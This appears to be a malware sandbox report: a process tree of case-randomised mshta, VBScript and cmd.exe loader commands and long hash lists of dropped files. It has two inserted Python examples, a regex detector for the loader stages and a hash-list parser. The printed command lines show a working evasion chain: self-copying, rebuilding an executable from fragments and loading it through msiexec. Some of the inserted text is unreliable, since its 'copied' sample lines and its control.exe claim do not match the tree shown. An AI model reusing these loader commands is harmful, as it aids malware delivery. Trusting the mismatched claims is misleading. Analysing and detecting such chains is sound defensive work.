C:\Users\Admin\AppData\Local\Temp\D5E5.exe (depth 1)
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7C90.exe (depth 1)
-
C:\Windows\SysWOW64\mshta.exe (depth 2)
  cmdline: "C:\Windows\System32\mshta.exe" vBsCRipt: cLosE ( creAteObjEcT( "wsCrIpT.ShEll"). RUn( "C:\Windows\system32\cmd.exe /q /c tyPe ""C:\Users\Admin\AppData\Local\Temp\7C90.exe"" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 &If """" == """" for %d iN ( ""C:\Users\Admin\AppData\Local\Temp\7C90.exe"" ) do taskkill /f /im ""%~NXd"" " ,0 , tRue ))
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmdline: "C:\Windows\system32\cmd.exe" /q /c tyPe "C:\Users\Admin\AppData\Local\Temp\7C90.exe" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 &If "" == "" for %d iN ("C:\Users\Admin\AppData\Local\Temp\7C90.exe") do taskkill /f /im "%~NXd"
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe (depth 4)
  cmdline: ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97
-
C:\Windows\SysWOW64\mshta.exe (depth 5)
  cmdline: "C:\Windows\System32\mshta.exe" vBsCRipt: cLosE ( creAteObjEcT( "wsCrIpT.ShEll"). RUn( "C:\Windows\system32\cmd.exe /q /c tyPe ""C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe"" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 &If ""-P3PZFXHgL5EFWq~tu7bw97 "" == """" for %d iN ( ""C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe"" ) do taskkill /f /im ""%~NXd"" " ,0 , tRue ))
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe (depth 6)
  cmdline: "C:\Windows\system32\cmd.exe" /q /c tyPe "C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 &If "-P3PZFXHgL5EFWq~tu7bw97 " == "" for %d iN ("C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe") do taskkill /f /im "%~NXd"
-
C:\Windows\SysWOW64\mshta.exe (depth 5)
  cmdline: "C:\Windows\System32\mshta.exe" vbScriPt: ClosE( CREaTEoBJeCT ( "WsCRipt.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /c ECHo | SeT /P = ""MZ"" > KXHc.NM& cOPy /y /b KxhC.NM + JN7HGm.~X +r7xx.iO ..\q3lZ0.u2D & sTArT msiexec /Y ..\q3Lz0.U2D & DeL /q * " , 0 , TRUE ))
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe (depth 6)
  cmdline: "C:\Windows\system32\cmd.exe" /c ECHo | SeT /P = "MZ" > KXHc.NM& cOPy /y /b KxhC.NM + JN7HGm.~X+r7xx.iO ..\q3lZ0.u2D & sTArT msiexec /Y ..\q3Lz0.U2D & DeL /q *
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHo "
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>KXHc.NM"
-
C:\Windows\SysWOW64\msiexec.exe (depth 7)
  cmdline: msiexec /Y ..\q3Lz0.U2D
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
  cmdline: taskkill /f /im "7C90.exe"
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
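The command lines above record one loader pattern end to end: mshta.exe evaluates inline VBScript that hands a cmd.exe one-liner to WScript.Shell; that one-liner copies the dropper under a random name with `type`, restarts it with a long random-looking argument and kills the original with taskkill; a second pass writes the two bytes "MZ" with `echo | set /p` (which emits no trailing newline), appends the remaining fragments with `copy /b`, and loads the rebuilt file through control.exe (which in turn spawns rundll32 Shell32.dll,Control_RunDLL) or through `msiexec /Y`. The letter casing of every token is randomised to defeat naive string matching. As an added example, not part of the sandbox report, here is a Python detector that normalises casing and whitespace, flags each stage with a regex, and scores a process tree by the number of distinct stages seen. The sample lines are copied from the tree above plus one constructed benign cmd.exe line; the stage names, the capture of the loaded file name, and the three-stage threshold are choices made for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed input for this example: five command lines copied from the process
# tree above (the F457/7C90 loader chains) and one benign cmd.exe line added for
# contrast. The randomised letter casing (tYPE, STARt, cOpy) is the sample's own.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" vBSCrIpT: clOse( CreatEoBJECT ( "wsCrIpT.SheLl").RUn ("C:\Windows\system32\cmd.exe /C tYPE ""C:\Users\Admin\AppData\Local\Temp\F457.exe"" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T & If """" == """" for %Y IN ( ""C:\Users\Admin\AppData\Local\Temp\F457.exe"" ) do taskkill -Im ""%~NxY"" /f ", 0 , TrUe ) )',
    r'"C:\Windows\System32\cmd.exe" /Q /c ECho | sEt /p = "MZ" > ~IPT1qBT.OO0&cOpy /b /Y ~iPT1QBT.OO0+ FYXY.~BG + AePh.D16 08paVA.D&staRT control.exe .\08pAVA.D&DEl FYXY.~Bg aEPh.D16 ~ipT1qBT.oO0',
    r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\08pAVA.D',
    r'msiexec /Y ..\q3Lz0.U2D',
    r'taskkill -Im "F457.exe" /f',
    r'"C:\Windows\System32\cmd.exe" /c dir C:\Users\Admin\Documents',  # benign, constructed
]


def normalise(cmdline: str) -> str:
    """Lower-case and collapse whitespace so case-randomised tokens compare equal."""
    return " ".join(cmdline.lower().split())


# One rule per loader stage seen in the tree. Regexes run on the normalised line;
# a capture group, where present, is the artefact worth pivoting on.
STAGE_RULES = [
    ("mshta runs inline VBScript that drives WScript.Shell",
     re.compile(r'mshta\.exe.*?vbscript:.*?createobject\s*\(\s*"wscript\.shell"\s*\)\s*\.\s*run')),
    ("dropper copies itself with type and restarts under a random name",
     re.compile(r'\btype\s+"*[^"\s]+\.exe"*\s*>\s*(?:\.\.\\)?([^\s&]+\.exe)\s*&&\s*start\b')),
    ("PE rebuilt from fragments (echo|set /p writes MZ, copy /b joins the rest)",
     re.compile(r'set\s*/p\s*=\s*"*mz"*\s*>.*?\bcopy\s+(?:/[by]\s+)+')),
    ("non-.cpl file handed to control.exe / Control_RunDLL",
     re.compile(r'(?:\bcontrol(?:\.exe)?\s+|control_rundll\s+|shell32\.dll",#44\s+)([^\s&|]+)')),
    ("msiexec /y used to register a dropped module",
     re.compile(r'\bmsiexec(?:\.exe)?\s+/y\s+([^\s&|]+)')),
    ("original dropper killed with taskkill",
     re.compile(r'\btaskkill\b.*?[-/]im\s+"*([^"\s]+)')),
]


def analyse(cmdline: str) -> List[Tuple[str, str]]:
    """Return (stage, artefact) pairs for every loader stage visible in one command line."""
    norm = normalise(cmdline)
    hits = []
    for stage, rx in STAGE_RULES:
        m = rx.search(norm)
        if not m:
            continue
        artefact = m.group(1) if m.groups() else ""
        # control.exe legitimately opens Control Panel items (.cpl); anything else
        # is the loader smuggling a DLL through Shell32's Control_RunDLL.
        if stage.startswith("non-.cpl") and artefact.endswith(".cpl"):
            continue
        hits.append((stage, artefact))
    return hits


def triage(cmdlines: List[str]) -> Tuple[str, List[str], Dict[str, List[Tuple[str, str]]]]:
    """Score a whole tree: a verdict, the distinct stages seen, and per-line findings."""
    per_line = {cmd: analyse(cmd) for cmd in cmdlines}
    stages = sorted({stage for hits in per_line.values() for stage, _ in hits})
    # Threshold is this example's choice: three distinct stages across one tree is
    # already the self-copy + rebuild + LOLBin-load skeleton shown above.
    verdict = "loader chain" if len(stages) >= 3 else "inconclusive"
    return verdict, stages, per_line


if __name__ == "__main__":
    verdict, stages, per_line = triage(SAMPLE_CMDLINES)
    print(f"verdict: {verdict}")
    for stage in stages:
        print(f"  stage: {stage}")
    for cmd, hits in per_line.items():
        if hits:
            print(f"\n{cmd[:70]}...")
            for stage, artefact in hits:
                print(f"  - {stage}" + (f" [{artefact}]" if artefact else ""))
```

Run against a real process-creation log (Sysmon event 1, EDR telemetry), feed each command line to `analyse` and keep the artefacts: the random executable name and the rebuilt file name are the two strings you will want to search the rest of the host for, and they are visible only after the casing has been normalised.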
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
-
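Several entries in the list that follows are repeated verbatim, and the same bytes appear under different names: F457.exe and nDRwKPXQhM.EXe share every digest (the `type` self-copy seen in the process tree), as do cupd.exe and sisbkup.exe. As an added example, not part of the sandbox report, here is a Python parser for the list in the fused form the raw extraction produced (path glued to the word MD5, then the MD5 on its own line, then SHA1, SHA256 and SHA512 each glued to their label). It validates digest lengths, rejects a truncated entry, collapses repeats and groups paths by SHA256 so renamed copies stand out. The five embedded entries are copied from the list; the function names and the grouping logic are this example's own.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed input: five entries copied from the Downloads list below, in the
# fused form of the raw extraction (path + "MD5", MD5 alone, SHAn glued to label).
SAMPLE_DOWNLOADS = r"""
C:\Users\Admin\AppData\Local\Temp\F457.exeMD5
94a8db67ef7f01974e353cc670c7c012
SHA144723bc5ff2d38e98ca844b9a20cb88652321bd3
SHA256ce55ef02983a3c2a33738a056e116869569d986ed1951fc16aab3b47d0610862
SHA512d24532d057ae971a041623ab61c5776d006f3622102436aa604dc281ede5ae98d2eb69b29691678efc53f94bd2fd61af1c02530ad5c36d3a1995934c05369aa9
-
C:\Users\Admin\AppData\Local\Temp\F457.exeMD5
94a8db67ef7f01974e353cc670c7c012
SHA144723bc5ff2d38e98ca844b9a20cb88652321bd3
SHA256ce55ef02983a3c2a33738a056e116869569d986ed1951fc16aab3b47d0610862
SHA512d24532d057ae971a041623ab61c5776d006f3622102436aa604dc281ede5ae98d2eb69b29691678efc53f94bd2fd61af1c02530ad5c36d3a1995934c05369aa9
-
C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXeMD5
94a8db67ef7f01974e353cc670c7c012
SHA144723bc5ff2d38e98ca844b9a20cb88652321bd3
SHA256ce55ef02983a3c2a33738a056e116869569d986ed1951fc16aab3b47d0610862
SHA512d24532d057ae971a041623ab61c5776d006f3622102436aa604dc281ede5ae98d2eb69b29691678efc53f94bd2fd61af1c02530ad5c36d3a1995934c05369aa9
-
C:\ProgramData\cupd.exeMD5
5e2a45118445517b62afdb40ad02f624
SHA1499a7e90ba84c811e13e1e4438a5381b67f61255
SHA256f6ea005ad45ca044b6575ba4e3e13b8e315657202b5a38a070066ad167e0bc62
SHA5125139da1331c4e07c7dbd4f823cedbd8e30ff3ccf18d06e2b99cbea127be6533ff0897aa971f0de4334decacfbca59c1c4db4e8ede1faf459de62f1cd8cb1129b
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeMD5
5e2a45118445517b62afdb40ad02f624
SHA1499a7e90ba84c811e13e1e4438a5381b67f61255
SHA256f6ea005ad45ca044b6575ba4e3e13b8e315657202b5a38a070066ad167e0bc62
SHA5125139da1331c4e07c7dbd4f823cedbd8e30ff3ccf18d06e2b99cbea127be6533ff0897aa971f0de4334decacfbca59c1c4db4e8ede1faf459de62f1cd8cb1129b
"""

# Labelled digest lines in the order they follow the MD5, with expected hex length.
LABELLED = (("SHA1", 40), ("SHA256", 64), ("SHA512", 128))


def parse_downloads(text: str) -> List[Tuple[str, Dict[str, str]]]:
    """Parse fused entries into (path, digests); reject malformed or truncated ones."""
    lines = [ln.strip() for ln in text.splitlines()]
    entries = []
    i = 0
    while i < len(lines):
        if not lines[i].endswith("MD5"):
            i += 1          # separators and stray lines
            continue
        path = lines[i][:-len("MD5")]
        if i + 4 >= len(lines):
            raise ValueError(f"{path}: entry truncated (page cut off mid-entry)")
        md5 = lines[i + 1]
        if not re.fullmatch(r"[0-9a-f]{32}", md5):
            raise ValueError(f"{path}: malformed MD5 line {md5!r}")
        digests = {"MD5": md5}
        for offset, (label, length) in enumerate(LABELLED, start=2):
            m = re.fullmatch(label + r"([0-9a-f]{%d})" % length, lines[i + offset])
            if not m:
                raise ValueError(f"{path}: malformed {label} line {lines[i + offset]!r}")
            digests[label] = m.group(1)
        entries.append((path, digests))
        i += 5
    return entries


def group_by_sha256(entries) -> Dict[str, List[str]]:
    """Collapse verbatim repeats: sha256 -> sorted distinct paths carrying those bytes."""
    groups: Dict[str, set] = defaultdict(set)
    for path, digests in entries:
        groups[digests["SHA256"]].add(path)
    return {sha: sorted(paths) for sha, paths in groups.items()}


def renamed_copies(entries) -> List[List[str]]:
    """Groups written under more than one name (self-copy, relocation to a persistence dir)."""
    return [paths for paths in group_by_sha256(entries).values() if len(paths) > 1]


if __name__ == "__main__":
    parsed = parse_downloads(SAMPLE_DOWNLOADS)
    for sha, paths in group_by_sha256(parsed).items():
        print(sha)
        for p in paths:
            print("   ", p)
```

Grouping on SHA256 rather than on path is what turns a long drop list into a handful of distinct payloads, and the multi-path groups are the ones to pivot on: the same bytes in %TEMP% and in a persistence directory tell you where the loader intends to survive a reboot.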
C:\ProgramData\cupd.exe
MD5: 5e2a45118445517b62afdb40ad02f624
SHA1: 499a7e90ba84c811e13e1e4438a5381b67f61255
SHA256: f6ea005ad45ca044b6575ba4e3e13b8e315657202b5a38a070066ad167e0bc62
SHA512: 5139da1331c4e07c7dbd4f823cedbd8e30ff3ccf18d06e2b99cbea127be6533ff0897aa971f0de4334decacfbca59c1c4db4e8ede1faf459de62f1cd8cb1129b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5: acaeda60c79c6bcac925eeb3653f45e0
SHA1: 2aaae490bcdaccc6172240ff1697753b37ac5578
SHA256: 6b0ceccf0103afd89844761417c1d23acc41f8aebf3b7230765209b61eee5658
SHA512: feaa6e7ed7dda1583739b3e531ab5c562a222ee6ecd042690ae7dcff966717c6e968469a7797265a11f6e899479ae0f3031e8cf5bebe1492d5205e9c59690900
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5: bb1d3017d7b6b0728b5d88036feecefa
SHA1: e53494d8747badd9eeebd41d4bc429eb5ce52f56
SHA256: c50e21e351dbcbbaa736d1e6af02da24b720f850fffeff1e4f83123cf181b050
SHA512: 9246e6f74a4ac5029c2135eab2311dd16592a2239fa51696dc8dca0e54583fe17f16f1a019a113142e6b521e9d6df7f565dfae4cc35949563dfb2bad8bfddf7a
-
C:\Users\Admin\AppData\Local\Temp\08pAVA.D
MD5: ba599f19d22e9e7d5128fd675602dad4
SHA1: 35975866267e6a67855197421f542aa9487f4213
SHA256: cdc392e75a8df20445ea2da0bf55cc9194ab2760dc7796fc5812b6eccdb6f8ec
SHA512: ce2cd831b28c2e4836c7ff2cc0e6c8ad8729d0232a781a56523c1336ce112f435fb6744fca336d505018fc8152ec0e511f30123fdfdad7c119a248457464f262
-
C:\Users\Admin\AppData\Local\Temp\101.exe
MD5: 1bef6a1a0d0cdcb868aaa9fffd513f25
SHA1: 769fce57adacbfca686118f9a45fce099abf2a20
SHA256: a36434a7f29255e4053d5593765e3eb27a4f257581f0a10f76ea8bec24850ab4
SHA512: 9cc963e386a8f7c2dcf0369987ebd60b7f45a9cd51d085505edc98aebc1d3e3a0591c32c5d193e9f9d1345780fb79cafbb21e1988a96d9b6fa4fef9cdbe1521a
-
C:\Users\Admin\AppData\Local\Temp\366.exe
MD5: 415ca937476dbf832d67387cc3617b37
SHA1: 8e0c58720101aaa9caf08218d40a1b0639801e04
SHA256: 6a099291e21f6e5bb49ace86a55bee087b9811e178693d0207dc9152beb39b76
SHA512: 5d649864508445aed5e1a1a70042d1ed32f5dd15d12e9466d82a72861d86f87f4c225931eb06fd5605292db431824b0450acd14cf408ea70c08b686e137c6c63
-
C:\Users\Admin\AppData\Local\Temp\630.exe
MD5: 44d57bd9b9006ac10bdf35f7d347037f
SHA1: 7a4e7d527f0dd67d00b38c4893800998ed2ca4df
SHA256: 515d537093956f134ef3bc3037b609afc47dc225964ffa527bec9c1be7243d1b
SHA512: 4183c2d42229f7ddc9233f5bcd05fbc21fff7f483cc228e567606726d6fd1ce5cbd66edf5e232f0d05b97da42ee9124e956b0d15adc7d2c404abc6c0936f8cfb
-
C:\Users\Admin\AppData\Local\Temp\CF8F.exe
MD5: d2fff856a1371f8b3602a2247ab26d46
SHA1: c2acff6cdf47ee82fe35637780e163e46ab5c4d7
SHA256: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531
SHA512: 6579f2e625ca19be10fcea9f68427c9887f21af26752d775b2987dace469759a8588b56a08a533fc4ba5055df4918c87ee1539146e58dc20c5c7280bef6d1d92
-
C:\Users\Admin\AppData\Local\Temp\D48F.exe
MD5: 8bbdfea55855e51dd9c60f92b3942335
SHA1: 7c828948577964f7304346b4aaf961e93eab3871
SHA256: 9023edd01e4425da0b95f71c90467e4463eabef5f848406d020e019d0315e5fc
SHA512: 8cc1a2d3e9030ba4efcc1217b0408c0a7add946c23121eb9ee164885e43b91eda7ac91db034f10526793eeaaf1826c5bc560eaa621718f8e7d2137fbdfcc7dba
-
C:\Users\Admin\AppData\Local\Temp\DE12.exe
MD5: cd9451e417835fa1447aff560ee9da73
SHA1: 51e2c4483795c7717f342556f6f23d1567b614a2
SHA256: 70616f9e69227bdc705494fa961e3b30049d14c03893c36bb66851053287fea7
SHA512: bb9f41bbeb161f589dbcd665b01272e28d10ff2467d4099cce90d92ba62c8f0931e04b0e3a722da964b895361bf1c3266bee2342f1a79392d3efb69fb978ab78
-
C:\Users\Admin\AppData\Local\Temp\E18C.exe
MD5: aa274b420a15cdb8384906a3c45a6d22
SHA1: 99bc08e28683f4b07f0c168facce2d529a08d0fa
SHA256: b9e7d6015213b2126e602e7e796f4590cdb2a941b4e8eb30b75bc9c46dce1754
SHA512: 1012f2fe52a514cb06f536c6343e9dddb1bcc914dee33c013ec393162c6151f61916bc147068c8db4377f2714f70903fbadfa74d23f104d12180c2d9b00fe7d1
-
C:\Users\Admin\AppData\Local\Temp\E812.exe
MD5: 51e0122416600a5ad548ccd6a836705f
SHA1: 1fdb0a4141b3b976e5c7ca957ab82e3421694e06
SHA256: 8caa545b435a018c1856e3acd2b5706db6037fc77b1d2620b53433be8fc252b2
SHA512: b307c6d17a9b17827b5fa7959b38c600c3e075dabf4961cfda8bb96aee11213818f6208e92765de336679e1919f96563f3ab1cea74ead8be112d2811a17d427c
-
C:\Users\Admin\AppData\Local\Temp\F457.exe
MD5: 94a8db67ef7f01974e353cc670c7c012
SHA1: 44723bc5ff2d38e98ca844b9a20cb88652321bd3
SHA256: ce55ef02983a3c2a33738a056e116869569d986ed1951fc16aab3b47d0610862
SHA512: d24532d057ae971a041623ab61c5776d006f3622102436aa604dc281ede5ae98d2eb69b29691678efc53f94bd2fd61af1c02530ad5c36d3a1995934c05369aa9
-
C:\Users\Admin\AppData\Local\Temp\F877.dll
MD5: 628b068ebb6c34efd8b4d21d4f4c7723
SHA1: 957bb67a89b7009539ecf2ac61ce83daf497a464
SHA256: 04d14e3e9c577b0fd56c1c63a6c9bdc5220db0b6af8d373831da2a3a79c45881
SHA512: 93870c1f43eba9104f5bfb7f0e58dd299e54d8958cb746f641b336da639a919b626f836914e1ad6582f2e83206984c6003c7476d84905d6cedc32cce2c3dc750
-
C:\Users\Admin\AppData\Local\Temp\FABE.exe
MD5: 3d2f9410885d7b18e85433e1a2193a31
SHA1: c73e53be8424f5452dd42972707b8149a0ef881f
SHA256: b07a51d46ac309c38fb927736ac6bf594e8437baf1776f075aca8fa54b48ce72
SHA512: 74e3ae0ada1fa1591fd7fe33001516f998e9b71b0dc0a1dc8cd0abbb1af6c4a8de5ce10529e319de13703cec47346d2ce7e5c09d8f068cfaa7d79f95dd0cdfb0
-
C:\Users\Admin\AppData\Local\Temp\FAC9.exe
MD5: 738f696f228f13c18454c013926b38b2
SHA1: 04c1ea711ed7077cee2b67c33577caadc24b97e8
SHA256: 0fc853cdddb7195dbf6052a7970add6d5cb57f6b7f2478f6e3de20ff87fc890f
SHA512: dc4f05debf4e41b52412b6681efd3ad2622cd9d2f401df317bfbb525797e3fb6000536e78d9dbff67f7149ee5b2db94ba723cff7315816c92095e551974a0038
-
C:\Users\Admin\AppData\Local\Temp\Fyxy.~Bg
MD5: 21b08d383108d1208e2d8acfee140958
SHA1: 5e87555e9a8e8e8f027159b532a8cd65c13585a6
SHA256: eb3c5d51b929f11959ad64ea2a69a073d0723757a50d59791a132e0da00ac70d
SHA512: cf06210eaf38907100f25b7ab488aa3cefd96fcd90372d1213d4a1ccda3229d6ab0d6b65e482681442022a03ff8c9ed08712abb0ea6c4e70960576640756f50c
-
C:\Users\Admin\AppData\Local\Temp\aePh.D16
MD5: 5fb6349941a886221a1ddf06bfa92d69
SHA1: 19d67e91086449bb909a4e9bec6289d04d4e5405
SHA256: cff2a3c23a505726b52897c6e30cf15df02e8d48631d229b658e67596cc700c0
SHA512: 64aecb33923f32415cabf969be98cdd76709daad98412e592c6a8e5461e76d76095f22dc012410f8c436d9f04c9ad1b22837bb730ec39684779bece66a1f8e6b
-
C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe
MD5: 94a8db67ef7f01974e353cc670c7c012
SHA1: 44723bc5ff2d38e98ca844b9a20cb88652321bd3
SHA256: ce55ef02983a3c2a33738a056e116869569d986ed1951fc16aab3b47d0610862
SHA512: d24532d057ae971a041623ab61c5776d006f3622102436aa604dc281ede5ae98d2eb69b29691678efc53f94bd2fd61af1c02530ad5c36d3a1995934c05369aa9
-
C:\Users\Admin\AppData\Local\Temp\zfadmvvq.exe
MD5: c3a9bd9abb6728127773c498e8f94b21
SHA1: 09587f25141a79ba9a276127698d8a5b092d9d33
SHA256: 0debdbae32356a0676856f8d5fb27d74d9611c16f79463961ba916fe0a144c89
SHA512: 7ea9d82b3f4229593a357259e900bd91776f204748b56db626cd4cc405b00bf7a0601c9ca92c54482a3ab3a71a0499dd7f98522604e557253c41204fa11d4c14
-
C:\Users\Admin\AppData\Local\Temp\~IPT1qBT.OO0
MD5: ac6ad5d9b99757c3a878f2d275ace198
SHA1: 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256: 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512: bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
MD5: 5e2a45118445517b62afdb40ad02f624
SHA1: 499a7e90ba84c811e13e1e4438a5381b67f61255
SHA256: f6ea005ad45ca044b6575ba4e3e13b8e315657202b5a38a070066ad167e0bc62
SHA512: 5139da1331c4e07c7dbd4f823cedbd8e30ff3ccf18d06e2b99cbea127be6533ff0897aa971f0de4334decacfbca59c1c4db4e8ede1faf459de62f1cd8cb1129b
-
C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe
MD5: c3a9bd9abb6728127773c498e8f94b21
SHA1: 09587f25141a79ba9a276127698d8a5b092d9d33
SHA256: 0debdbae32356a0676856f8d5fb27d74d9611c16f79463961ba916fe0a144c89
SHA512: 7ea9d82b3f4229593a357259e900bd91776f204748b56db626cd4cc405b00bf7a0601c9ca92c54482a3ab3a71a0499dd7f98522604e557253c41204fa11d4c14
-
\ProgramData\cupd.exe
MD5: 5e2a45118445517b62afdb40ad02f624
SHA1: 499a7e90ba84c811e13e1e4438a5381b67f61255
SHA256: f6ea005ad45ca044b6575ba4e3e13b8e315657202b5a38a070066ad167e0bc62
SHA512: 5139da1331c4e07c7dbd4f823cedbd8e30ff3ccf18d06e2b99cbea127be6533ff0897aa971f0de4334decacfbca59c1c4db4e8ede1faf459de62f1cd8cb1129b
-
\ProgramData\mozglue.dll
MD5: 8f73c08a9660691143661bf7332c3c27
SHA1: 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256: 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512: 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
\ProgramData\msvcp140.dll
MD5: 109f0f02fd37c84bfc7508d4227d7ed5
SHA1: ef7420141bb15ac334d3964082361a460bfdb975
SHA256: 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512: 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
\ProgramData\nss3.dll
MD5: bfac4e3c5908856ba17d41edcd455a51
SHA1: 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256: e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512: 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
\ProgramData\sqlite3.dll
MD5: e477a96c8f2b18d6b5c27bde49c990bf
SHA1: e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256: 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512: 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c
-
\ProgramData\vcruntime140.dll
MD5: 7587bf9cb4147022cd5681b015183046
SHA1: f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256: c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512: 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
\Users\Admin\AppData\Local\Temp\08paVA.D
MD5: ba599f19d22e9e7d5128fd675602dad4
SHA1: 35975866267e6a67855197421f542aa9487f4213
SHA256: cdc392e75a8df20445ea2da0bf55cc9194ab2760dc7796fc5812b6eccdb6f8ec
SHA512: ce2cd831b28c2e4836c7ff2cc0e6c8ad8729d0232a781a56523c1336ce112f435fb6744fca336d505018fc8152ec0e511f30123fdfdad7c119a248457464f262
-
\Users\Admin\AppData\Local\Temp\101.exe
MD5
1bef6a1a0d0cdcb868aaa9fffd513f25
SHA1
769fce57adacbfca686118f9a45fce099abf2a20
SHA256
a36434a7f29255e4053d5593765e3eb27a4f257581f0a10f76ea8bec24850ab4
SHA512
9cc963e386a8f7c2dcf0369987ebd60b7f45a9cd51d085505edc98aebc1d3e3a0591c32c5d193e9f9d1345780fb79cafbb21e1988a96d9b6fa4fef9cdbe1521a
-
\Users\Admin\AppData\Local\Temp\1105.tmp
MD5
d124f55b9393c976963407dff51ffa79
SHA1
2c7bbedd79791bfb866898c85b504186db610b5d
SHA256
ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
SHA512
278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06
-
\Users\Admin\AppData\Local\Temp\366.exe
(listed 4 times in the dropped-files report, with identical hashes each time)
MD5
415ca937476dbf832d67387cc3617b37
SHA1
8e0c58720101aaa9caf08218d40a1b0639801e04
SHA256
6a099291e21f6e5bb49ace86a55bee087b9811e178693d0207dc9152beb39b76
SHA512
5d649864508445aed5e1a1a70042d1ed32f5dd15d12e9466d82a72861d86f87f4c225931eb06fd5605292db431824b0450acd14cf408ea70c08b686e137c6c63
-
\Users\Admin\AppData\Local\Temp\CF8F.exe
MD5
d2fff856a1371f8b3602a2247ab26d46
SHA1
c2acff6cdf47ee82fe35637780e163e46ab5c4d7
SHA256
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531
SHA512
6579f2e625ca19be10fcea9f68427c9887f21af26752d775b2987dace469759a8588b56a08a533fc4ba5055df4918c87ee1539146e58dc20c5c7280bef6d1d92
-
\Users\Admin\AppData\Local\Temp\E812.exe
MD5
51e0122416600a5ad548ccd6a836705f
SHA1
1fdb0a4141b3b976e5c7ca957ab82e3421694e06
SHA256
8caa545b435a018c1856e3acd2b5706db6037fc77b1d2620b53433be8fc252b2
SHA512
b307c6d17a9b17827b5fa7959b38c600c3e075dabf4961cfda8bb96aee11213818f6208e92765de336679e1919f96563f3ab1cea74ead8be112d2811a17d427c
-
\Users\Admin\AppData\Local\Temp\F877.dll
MD5
628b068ebb6c34efd8b4d21d4f4c7723
SHA1
957bb67a89b7009539ecf2ac61ce83daf497a464
SHA256
04d14e3e9c577b0fd56c1c63a6c9bdc5220db0b6af8d373831da2a3a79c45881
SHA512
93870c1f43eba9104f5bfb7f0e58dd299e54d8958cb746f641b336da639a919b626f836914e1ad6582f2e83206984c6003c7476d84905d6cedc32cce2c3dc750
-
